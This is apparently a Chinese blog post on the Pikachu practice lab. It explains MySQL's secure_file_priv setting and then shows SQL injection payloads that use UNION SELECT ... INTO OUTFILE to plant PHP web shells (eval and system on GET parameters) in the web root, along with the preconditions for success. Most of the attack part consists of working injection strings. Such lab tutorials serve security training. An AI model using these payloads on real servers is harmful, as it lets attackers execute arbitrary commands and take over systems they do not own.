Pikachu-Sql-Inject - 通过sql进行远程服务器控制(试验)

secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。

查看命令:

复制代码
show variables like "secure%" 
//或者
select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的读取和写入。

2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

into outfile ,将select 的结果写入到指定的文件中;

复制代码
vince' union select " <?php @eval($_GET['test'])?>",2 into outfile "/var/www/html/1.php"#
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/www/html/2.php"#

//构造sql
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/lib/mysql-files/2.php"#

执行sql语句

进入到服务器目录下,看到文件已生成;

这个实验有三个前提条件:

1、需要知道远程服务器的文件目录;

2、需要该目录有写权限;

3、需要数据库开启secure_file_priv权限;

相关推荐
android_xc8 分钟前
Android Studio适配butterknife遇到的坑
android·ide·android studio·butterknife
2501_9159184121 分钟前
uni-app 项目 iOS 上架效率优化 从工具选择到流程改进的实战经验
android·ios·小程序·uni-app·cocoa·iphone·webview
Chan1626 分钟前
【智能协同云图库】基于统一接口架构构建多维度分析功能、结合 ECharts 可视化与权限校验实现用户 / 管理员图库统计、通过 SQL 优化与流式处理提升数据
java·spring boot·后端·sql·spring·intellij-idea·echarts
对你无可奈何33 分钟前
关于Ubuntu的 update造成的内核升级
运维·服务器·ubuntu
00后程序员张40 分钟前
如何在不同 iOS 设备上测试和上架 uni-app 应用 实战全流程解析
android·ios·小程序·https·uni-app·iphone·webview
float_六七1 小时前
预编译SQL:安全与性能的双重保障
sql·安全·oracle
GanGuaGua1 小时前
Linux系统:线程的互斥和安全
linux·运维·服务器·c语言·c++·安全
lsnm1 小时前
【LINUX网络】IP——网络层
linux·服务器·网络·c++·网络协议·tcp/ip
努力学习的小廉2 小时前
深入了解linux系统—— POSIX信号量
linux·运维·服务器
米豆同学2 小时前
SufraceFlinger图像合成原理(3)-SurfaceFlinger中Layer的创建和销毁
android